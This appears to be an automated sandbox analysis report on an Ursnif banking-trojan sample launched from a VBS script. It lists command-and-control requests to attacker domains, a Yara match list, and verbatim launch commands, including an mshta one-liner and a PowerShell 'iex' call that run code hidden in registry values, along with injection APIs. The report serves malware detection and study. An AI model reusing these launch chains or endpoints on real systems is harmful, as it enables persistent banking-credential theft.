                      Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000027.00000002.678851072.0000019D8BA60000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000027.00000002.698930392.0000019D9B8AE000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: unknownHTTP traffic detected: POST /E5wXpiwar/wRvu2gZe47zRdlNBgcs0/eOhrCgUr4ZXAn_2BZqF/9q3EAQRMUh_2B_2F33UbfY/IXr06mXceQHe3/2iAe1c3a/9nqOhYkWYxxgxCOECBlwLnA/sWEj3oJk5h/PRzUbXzmSIea8A2EU/_2FwPSG35Krj/kfkkMNBeoRA/5ZUbFMHjnJYo4_/2Fjo7tU3n9R4Z09v5Qh4q/QBVxo02azbkNlwWF/Bex9GHi32MTaVfj/GKDsgaU6HjZIpEcGiU/Q_2FxW4S4/w_2F825rdJVVRhGtH6Fv/DcD1MSlvdu470uFUctq/iMqZ2HgnOsvQUh/nmg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Content-Length: 2Host: art.microsoftsofymicrosoftsoft.at
                      Source: unknownDNS traffic detected: queries for: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /JWEVOwMBnh_2FtPS/WMS3RPVZyjTSnTq/9Hxp202Yz5PgJEOrB6/nF_2FNmSa/SQyIRZk5j_2B3OcT7rdM/7npsCxfJSu8JbD_2FiM/y1HBEgDsmQFEPX27nGHHbz/zR0jF_2FnlVo0/Nxk3zALE/ofyPMDXzWjS1IpBinC5Sz4W/cf_2F5pD8G/46Dgl0akFp2cXbFnY/HwtGCbH5Q64m/f9VXk69LnhQ/x_2B8W86eQh4Rn/mNr7OMCC6GA9c9ph_2Bg7/ddhYlIa8YUPQgtGC/8R2fSBf4sQLaQ_2/FLycNJhDT_2FxWMMIH/41wPmVaCG/UdSw_2BuW4yZulffApAL/Gvq14U65qaj/9np83 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /gO6fEM48Z2VyJYyEaQk/Tlg2ka7bPKYxRb_2B442I_/2FFZLVL8c_2BN/KPEiurg_/2FQFW58y_2BC5_2BoQJsMfC/Z20kSl3bCK/Qe_2BCo_2BI8EhVfz/gaTQA1FJpKmh/Okd_2B3iR1p/U_2F_2F_2BxYfZ/z_2B8obDRzLj_2BvPtXpS/MutYXow3kjfHv8Ne/Tk41k1QbLs08co6/pw6aojLzb_2BsMklC7/1luisc2vx/yYmG1Q6eqChu6qOfd2lR/zgadpa0en2mVI5QE7we/rWllKXh4B6iqFxDAWQqk8G/Oj17QsJan3SWq/MhUPAmuR/Yiolc5JDgbwuOe67l9VgfXi/kgInUUiADdo06Z7N/8 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                      Source: global trafficHTTP traffic detected: GET /fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0Host: art.microsoftsofymicrosoftsoft.at

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

                      E-Banking Fraud:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01203276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,34_2_01203276

                      System Summary:

                      barindex
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_0120175434_2_01201754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01207E3034_2_01207E30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_0120725F34_2_0120725F
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CE95C39_2_0000019D8B7CE95C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DB94839_2_0000019D8B7DB948
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DB23039_2_0000019D8B7DB230
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D516439_2_0000019D8B7D5164
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C116439_2_0000019D8B7C1164
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C415039_2_0000019D8B7C4150
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B000039_2_0000019D8B7B0000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B213839_2_0000019D8B7B2138
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C012439_2_0000019D8B7C0124
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CA9F839_2_0000019D8B7CA9F8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C782039_2_0000019D8B7C7820
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B100039_2_0000019D8B7B1000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B90FC39_2_0000019D8B7B90FC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C70C839_2_0000019D8B7C70C8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D88B839_2_0000019D8B7D88B8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CF7B439_2_0000019D8B7CF7B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7E479639_2_0000019D8B7E4796
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CA79039_2_0000019D8B7CA790
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B361039_2_0000019D8B7B3610
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D2EF839_2_0000019D8B7D2EF8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B76F439_2_0000019D8B7B76F4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D5ED839_2_0000019D8B7D5ED8
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CC6C439_2_0000019D8B7CC6C4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C2EC039_2_0000019D8B7C2EC0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D06B439_2_0000019D8B7D06B4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D6EA039_2_0000019D8B7D6EA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C668439_2_0000019D8B7C6684
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C950039_2_0000019D8B7C9500
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C1DF439_2_0000019D8B7C1DF4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D4DE039_2_0000019D8B7D4DE0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C5DBC39_2_0000019D8B7C5DBC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C559C39_2_0000019D8B7C559C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D940839_2_0000019D8B7D9408
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D340039_2_0000019D8B7D3400
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B74A439_2_0000019D8B7B74A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C448439_2_0000019D8B7C4484
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B4B6039_2_0000019D8B7B4B60
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D435439_2_0000019D8B7D4354
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B134839_2_0000019D8B7B1348
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C834039_2_0000019D8B7C8340
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CD32839_2_0000019D8B7CD328
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D730C39_2_0000019D8B7D730C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7BABDC39_2_0000019D8B7BABDC
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DA3A439_2_0000019D8B7DA3A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D4BA039_2_0000019D8B7D4BA0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CBA7439_2_0000019D8B7CBA74
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7B9AD839_2_0000019D8B7B9AD8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_012040DC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,34_2_012040DC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01208055 NtQueryVirtualMemory,34_2_01208055
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CE95C NtSetContextThread,NtUnmapViewOfSection,39_2_0000019D8B7CE95C
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C1950 NtWriteVirtualMemory,39_2_0000019D8B7C1950
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7CE860 NtQueryInformationProcess,39_2_0000019D8B7CE860
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7DA8F0 NtSetInformationProcess,CreateRemoteThread,ResumeThread,39_2_0000019D8B7DA8F0
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7D20A4 NtQueryInformationToken,NtQueryInformationToken,39_2_0000019D8B7D20A4
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C8B90 NtMapViewOfSection,39_2_0000019D8B7C8B90
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 39_2_0000019D8B7C5B80 NtCreateSection,39_2_0000019D8B7C5B80
                      Source: 1cv1ijms.dll.41.drStatic PE information: No import functions for PE file found
                      Source: start[526268].vbsInitial sample: Strings found which are bigger than 50
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: unknownProcess created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'Jump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                      Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20210910Jump to behavior
                      Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
                      Source: classification engineClassification label: mal100.troj.evad.winVBS@17/16@6/1
                      Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dllJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 34_2_01202102 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle,34_2_01202102
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_01
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{9E926C87-6559-80BB-DFB2-69B48306AD28}
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: start[526268].vbsStatic file information: File size 1402115 > 1048576
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.391888818.000002CC178CF000.00000004.00000001.sdmp, fum.cpp.0.dr
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdb source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.pdbXP source: powershell.exe, 00000027.00000002.694302202.0000019D8EDD4000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      VBScript performs obfuscated calls to suspicious functionsShow sources
